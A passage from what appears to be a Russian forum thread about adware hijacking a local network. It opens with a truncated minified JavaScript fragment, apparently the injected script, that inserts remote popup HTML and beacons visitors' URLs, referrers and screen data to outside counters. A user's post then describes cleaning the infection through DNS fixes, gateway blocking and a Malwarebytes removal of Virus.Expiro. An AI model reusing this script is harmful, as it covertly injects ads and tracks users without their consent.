a+5+q),w)o.d=a+5,x(v,U),T()}else{clearInterval(na);x(v,o.e+q);if(w)o.d=o.e,x(v,U),T(),f.attachEvent("onscroll",wa),f.attachEvent("onresize",wa);setTimeout(Ua,100)}},25)},o.innerHTML=c.source,ba||setTimeout(function(){var a=0,a=w?o.offsetHeight:n.defaultView.getComputedStyle(o,l).height;f[b].bottomReady(e(a)-5,1)},250),i["_"+c.id].f=j;if(d&&"float"==c.type){m=z;P||(O(c.style),D(d,ja,Q));if(!g(r[k])){var k=c.id;r[k]=i["_"+k];r[k].B=k;r[k].a=d;r[k].k=z;r[k].s=z;r[k].h=z;r[k].i=0;r[k].j=z;m=j}r[k].a.innerHTML=
c.source;r[k].a.style[r[k].b]=-1E3+q;r[k].a.style.display="block";r[k].width=e(r[k].a.width?r[k].a.width:r[k].a.offsetWidth);r[k].a.style[r[k].b]=-r[k].width+q;Ya(r[k],m);if(r[k].j)r[k].j=z;Fa(r[k])();i["_"+c.id].f=j;getElementsByClass("retail__tsbc",d).length&&E.push(d)}}}for(var y in i)i.hasOwnProperty(y)&&!g(i[y].f)&&g(i[y].r)&&i[y].r();P=z;setTimeout(function(){f[h].allLoaded()},0);da()};(function(){for(var a in i)if(i.hasOwnProperty(a)&&"object"==typeof i[a]){var b=n.getElementById(i[a].id),
c=z;g(i[a].type)&&"float"==i[a].type&&-1!=n.cookie.indexOf("_lxretpopupignore=1")&&(c=j);if(!b||c)delete i[a];else if((V||ma)&&g(i[a].type)&&"bottom"==i[a].type)if(ya().m){if(Oa=j,!g(i[a].o)||g(i[a].o)&&!i[a].o)F+=1}else F+=1;else F+=1}})();(new Image).src="http://counter.yadro.ru/hit;Luxup?r"+escape(n.referrer)+("undefined"==typeof screen?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(n.URL)+";"+Math.random();(new Image).src="http://"+S+"/merge_gpsid/?t="+(new Date).getTime();za(0)})();

fyntig > 26-12-2012 13:07:06

У меня было это в сети. Гугл вывел на ваш форум, но приведённые советы не помогли, поэтому напишу тут свой случай (вдруг ещё кого гугл сюда с этим занесёт). Вся сеть начала получать это безобразие. Сразу полез искать на шлюзе (использую Kerio). Там днс всё чисто, но даже с него ходит на эти сайты. Первое что сделал: запретил доступ на mc.yandex.ru - некоторые сайты (например rmsauto.ru) начали тормозить из-за того что при каждом действии пытался выполниться скрипт, но большинство начало работать нормально. Причём шлюз тоже начал ходить нормально на сайты, хотя на него acl не распространяются и поидее он единственный должен был остаться глючным. Сделал вывод, что скрипт работает в связке 1 комп в сети + шлюз. У нас всего несколько компов имеют право менять вручную себе настройки подключения (на всякие чп оставлено) поэтому нашёл быстро и поправил в нём запасной днс (как говорилось тут на форуме). Потом скачал бесплатную программу Malwarebytes Anti-Malware (отсюда: malwarebytes.org), запустил полное сканирование и нашлось C:\WINDOWS\system32\inetsrv\iissync.exe (Virus.Expiro) -> Помещено в карантин и успешно удалено. Только после этого на шлюзе всё стало работать как надо и можно было отменять запрет на mc.yandex.ru. Как попало на комп точно не признались, но моё подозрение что пытались скачать .jpg файл, который на самом деле являлся .js. Почему антивирь (Нод5) разрешил - тоже не понятно, на шлюзе он, кстати, тот файл тоже вирусом не считал.